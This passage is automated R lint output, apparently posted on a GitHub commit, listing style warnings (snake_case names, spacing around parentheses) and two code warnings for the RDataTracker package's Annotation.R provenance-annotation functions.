*style:* **Variable or function name should be snake_case.**\n```r\n​    caller.frame <- .ddg.find.ddg.return.value.caller.frame.number ()\n    ^~~~~~~~~~~~\n```\n[R/Annotation.R:131:68:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L131) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    caller.frame <- .ddg.find.ddg.return.value.caller.frame.number ()\n                                                                   ^\n```\n[R/Annotation.R:137:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L137) *style:* **Variable or function name should be snake_case.**\n```r\n​    caller.frame <- -1\n    ^~~~~~~~~~~~\n```\n[R/Annotation.R:154:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L154) *style:* **Variable or function name should be snake_case.**\n```r\n​    full.call <- match.call(sys.function(caller.frame), call=call)\n    ^~~~~~~~~\n```\n[R/Annotation.R:161:14:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L161) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    .ddg.dec (\".ddg.func.depth\")\n             ^\n```\n[R/Annotation.R:166:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L166) *style:* **Variable or function name should be snake_case.**\n```r\n​    return.stmt <- .ddg.construct.DDGStatement (parse(text=orig.return), \n    ^~~~~~~~~~~\n```\n[R/Annotation.R:166:48:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L166) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return.stmt <- .ddg.construct.DDGStatement (parse(text=orig.return), \n                                               ^\n```\n[R/Annotation.R:171:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L171) *style:* **Variable or function name should be snake_case.**\n```r\n​    return.stmt <- cmd.func()\n    ^~~~~~~~~~~\n```\n[R/Annotation.R:176:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L176) *style:* **Variable or function name should be snake_case.**\n```r\n​  call.text <- gsub(\" \", \"\", deparse(call, nlines=1))\n  ^~~~~~~~~\n```\n[R/Annotation.R:177:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L177) *style:* **Variable or function name should be snake_case.**\n```r\n​  return.node.name <- paste(call.text, \"return\")\n  ^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:181:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L181) *style:* **Variable or function name should be snake_case.**\n```r\n​  return.node.scope <-\n  ^~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:182:23:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L182) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​      environmentName (if (sys.nframe() == 2) .GlobalEnv\n                      ^\n```\n[R/Annotation.R:201:29:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L201) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  .ddg.add.to.return.values (call.text)\n                            ^\n```\n[R/Annotation.R:207:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L207) *style:* **Variable or function name should be snake_case.**\n```r\n​    vars.used <- return.stmt@vars.used\n    ^~~~~~~~~\n```\n[R/Annotation.R:224:13:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L224) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( .ddg.is.nonlocal.assign(return.stmt@parsed[[1]]) )\n            ^\n```\n[R/Annotation.R:224:62:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L224) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( .ddg.is.nonlocal.assign(return.stmt@parsed[[1]]) )\n                                                             ^\n```\n[R/Annotation.R:226:29:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L226) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          env <- .ddg.where( var, env = parent.env(parent.frame()), warning = FALSE )\n                            ^\n```\n[R/Annotation.R:226:84:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L226) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          env <- .ddg.where( var, env = parent.env(parent.frame()), warning = FALSE )\n                                                                                   ^\n```\n[R/Annotation.R:228:15:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L228) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          if ( identical(env, \"undefined\") )\n              ^\n```\n[R/Annotation.R:228:43:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L228) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          if ( identical(env, \"undefined\") )\n                                          ^\n```\n[R/Annotation.R:243:44:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L243) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    .ddg.create.file.write.nodes.and.edges ()\n                                           ^\n```\n[R/Annotation.R:244:42:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L244) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    .ddg.create.graphics.nodes.and.edges ()\n                                         ^\n```\n[R/Annotation.R:250:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L250) *warning:* **no visible global function definition for ‘.ddg.add.finish.node’**\n```r\n​  .ddg.add.finish.node()\n  ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:263:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L263) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.find.ddg.return.value.caller.frame.number <- function() {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:268:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L268) *style:* **Variable or function name should be snake_case.**\n```r\n​  ddg.funcs <- unlist(lapply (calls, \n  ^~~~~~~~~\n```\n[R/Annotation.R:268:30:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L268) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  ddg.funcs <- unlist(lapply (calls, \n                             ^\n```\n[R/Annotation.R:269:14:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L269) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    function (call) return (grepl(\"^ddg|.ddg\", deparse(call)[[1]]))))\n             ^\n```\n[R/Annotation.R:269:28:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L269) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    function (call) return (grepl(\"^ddg|.ddg\", deparse(call)[[1]]))))\n                           ^\n```\n[R/Annotation.R:270:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L270) *style:* **Variable or function name should be snake_case.**\n```r\n​  calls.to.ddg.return.value <- unlist(lapply(calls, \n  ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:271:14:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L271) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    function (call) \n             ^\n```\n[R/Annotation.R:273:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L273) *style:* **Variable or function name should be snake_case.**\n```r\n​  non.ddg.calls.to.ddg.return.value <- !(ddg.funcs[1:length(ddg.funcs)-1]) & \n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:275:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L275) *style:* **Variable or function name should be snake_case.**\n```r\n​  which.frame <- Position (function (call) return (call), \n  ^~~~~~~~~~~\n```\n[R/Annotation.R:275:27:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L275) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  which.frame <- Position (function (call) return (call), \n                          ^\n```\n[R/Annotation.R:275:37:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L275) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  which.frame <- Position (function (call) return (call), \n                                    ^\n```\n[R/Annotation.R:275:51:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L275) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  which.frame <- Position (function (call) return (call), \n                                                  ^\n```\n[R/Annotation.R:279:10:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L279) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (which.frame)\n         ^\n```\n[R/Annotation.R:286:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L286) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.annotate.inside <- function() {\n^~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:303:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L303) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.details.omitted <- function() {\n^~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:304:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L304) *style:* **Variable or function name should be snake_case.**\n```r\n​  pnode.name <- \"Details Omitted\"\n  ^~~~~~~~~~\n```\n[R/Annotation.R:320:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L320) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.should.run.annotated <- function (func.name) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:320:38:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L320) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​ddg.should.run.annotated <- function (func.name) {\n                                     ^\n```\n[R/Annotation.R:320:39:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L320) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.should.run.annotated <- function (func.name) {\n                                      ^~~~~~~~~\n```\n[R/Annotation.R:323:63:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L323) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  if (!.ddg.loop.annotate() && .ddg.inside.loop() > 0) return (FALSE)\n                                                              ^\n```\n[R/Annotation.R:334:10:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L334) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (.ddg.annotate.inside()) \n         ^\n```\n[R/Annotation.R:353:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L353) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.eval <- function(statement, cmd.func=NULL) {\n^~~~~~~~\n```\n[R/Annotation.R:353:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L353) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.eval <- function(statement, cmd.func=NULL) {\n                                ^~~~~~~~\n```\n[R/Annotation.R:357:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L357) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.statement <- parse(text=statement)\n    ^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:365:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L365) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.statement <- cmd@parsed\n    ^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:371:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L371) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.statement <- cmd@parsed\n    ^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:374:31:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L374) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  if (.ddg.debug.lib()) print (paste(\"ddg.eval: statement =\", statement))\n                              ^\n```\n[R/Annotation.R:376:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L376) *style:* **Variable or function name should be snake_case.**\n```r\n​  frame.num <- .ddg.get.frame.number(sys.calls())\n  ^~~~~~~~~\n```\n[R/Annotation.R:393:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L393) *style:* **Variable or function name should be snake_case.**\n```r\n​  return.value <- .ddg.parse.commands(parsed.statement, environ=env, \n  ^~~~~~~~~~~~\n```\n[R/Annotation.R:404:10:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L404) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (return.value)\n         ^\n```\n[R/Annotation.R:414:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L414) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.start <- function(pname=NULL) {\n^~~~~~~~~\n```\n[R/Annotation.R:427:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L427) *style:* **Variable or function name should be snake_case.**\n```r\n​  frame.number <- .ddg.get.frame.number(sys.calls())\n  ^~~~~~~~~~~~\n```\n[R/Annotation.R:429:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L429) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  .ddg.create.start.for.cur.cmd (env)\n                                ^\n```\n[R/Annotation.R:447:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L447) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.finish <- function(pname=NULL) {\n^~~~~~~~~~\n```\n[R/Annotation.R:455:31:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L455) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    .ddg.insert.error.message (msg)\n                              ^\n```\n[R/Annotation.R:466:19:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L466) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return(.ddg.get (\".ddg.last.R.value\"))\n                  ^\n```\n[R/Annotation.R:474:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L474) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.annotate.on <- function (fnames=NULL){\n^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:474:29:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L474) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​ddg.annotate.on <- function (fnames=NULL){\n                            ^\n```\n[R/Annotation.R:482:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L482) *style:* **Variable or function name should be snake_case.**\n```r\n​  on.list <- .ddg.get(\"ddg.annotate.on\")\n  ^~~~~~~\n```\n[R/Annotation.R:483:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L483) *style:* **Variable or function name should be snake_case.**\n```r\n​  on.list <- union (on.list, fnames)\n  ^~~~~~~\n```\n[R/Annotation.R:483:20:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L483) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  on.list <- union (on.list, fnames)\n                   ^\n```\n[R/Annotation.R:487:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L487) *style:* **Variable or function name should be snake_case.**\n```r\n​  off.list <- .ddg.annotate.off()\n  ^~~~~~~~\n```\n[R/Annotation.R:488:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L488) *style:* **Variable or function name should be snake_case.**\n```r\n​  off.list <- Filter (function(off) !(off %in% fnames), off.list)\n  ^~~~~~~~\n```\n[R/Annotation.R:488:22:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L488) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  off.list <- Filter (function(off) !(off %in% fnames), off.list)\n                     ^\n```\n[R/Annotation.R:498:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L498) *style:* **Variable or function name should be snake_case.**\n```r\n​ddg.annotate.off <- function (fnames=NULL) {\n^~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:498:30:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L498) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​ddg.annotate.off <- function (fnames=NULL) {\n                             ^\n```\n[R/Annotation.R:506:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L506) *style:* **Variable or function name should be snake_case.**\n```r\n​  off.list <- .ddg.annotate.off()\n  ^~~~~~~~\n```\n[R/Annotation.R:507:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L507) *style:* **Variable or function name should be snake_case.**\n```r\n​  off.list <- union (off.list, fnames)\n  ^~~~~~~~\n```\n[R/Annotation.R:507:21:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L507) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  off.list <- union (off.list, fnames)\n                    ^\n```\n[R/Annotation.R:511:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L511) *style:* **Variable or function name should be snake_case.**\n```r\n​  on.list <- .ddg.annotate.on()\n  ^~~~~~~\n```\n[R/Annotation.R:512:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L512) *style:* **Variable or function name should be snake_case.**\n```r\n​  on.list <- Filter (function(on) !(on %in% fnames), on.list)\n  ^~~~~~~\n```\n[R/Annotation.R:512:21:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L512) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  on.list <- Filter (function(on) !(on %in% fnames), on.list)\n                    ^\n```\n[R/Annotation.R:523:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L523) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.save.annotated.script <- function(cmds, script.name) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:523:46:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L523) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.save.annotated.script <- function(cmds, script.name) {\n                                             ^~~~~~~~~~~\n```\n[R/Annotation.R:542:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L542) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.annotations <- function(command) {\n^~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:545:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L545) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command <- command@parsed[[1]]\n  ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:552:12:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L552) *warning:* **possible error in .ddg.add.ddg.source(parsed.command, command): unused argument (command)**\n```r\n​    return(.ddg.add.ddg.source(parsed.command, command))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:562:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L562) *style:* **Variable or function name should be snake_case.**\n```r\n​  statement.type <- .ddg.get.statement.type(parsed.command)\n  ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:563:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L563) *style:* **Variable or function name should be snake_case.**\n```r\n​  loop.types <- list(\"for\", \"while\", \"repeat\")\n  ^~~~~~~~~~\n```\n[R/Annotation.R:593:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L593) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.ddg.source <- function(parsed.command, cmd) {\n^~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:593:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L593) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.ddg.source <- function(parsed.command, cmd) {\n                                ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:594:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L594) *style:* **Variable or function name should be snake_case.**\n```r\n​  script.name <- deparse(parsed.command[[2]])\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:595:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L595) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command.txt <- paste(\"ddg.source(\", script.name, \n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:614:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L614) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.function.annotations <- function(function.decl) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:614:43:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L614) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.function.annotations <- function(function.decl) {\n                                          ^~~~~~~~~~~~~\n```\n[R/Annotation.R:616:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L616) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.function.decl <- function.decl@parsed[[1]]\n  ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:619:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L619) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.name <- toString(parsed.function.decl[[2]])\n  ^~~~~~~~~\n```\n[R/Annotation.R:623:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L623) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.definition <- parsed.function.decl[[3]]\n  ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:627:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L627) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.create.function.block(func.definition)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:631:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L631) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.definition <- .ddg.add.conditional.statement(func.definition, func.name)\n  ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:635:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L635) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.insert.ddg.function(func.definition)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:640:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L640) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.wrap.all.return.parameters(func.definition, \n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:646:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L646) *style:* **Variable or function name should be snake_case.**\n```r\n​  last.statement <- .ddg.find.last.statement(func.definition)\n  ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:651:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L651) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.wrap.last.line(func.definition, function.decl@contained)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:658:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L658) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.wrap.with.ddg.eval(func.definition, function.decl@contained)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:663:10:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L663) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (as.expression (call (\"<-\", as.name(func.name), func.definition)))\n         ^\n```\n[R/Annotation.R:663:25:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L663) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (as.expression (call (\"<-\", as.name(func.name), func.definition)))\n                        ^\n```\n[R/Annotation.R:663:31:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L663) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (as.expression (call (\"<-\", as.name(func.name), func.definition)))\n                              ^\n```\n[R/Annotation.R:672:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L672) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.function.block <- function(func.definition) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:672:40:](https://github.com/End-to-end-provenance/RDataTracker/blob/ab8872f572c2469067712b458d61795e97b7375f/R/Annotation.R#L672) *style:* **Variable or function name should be 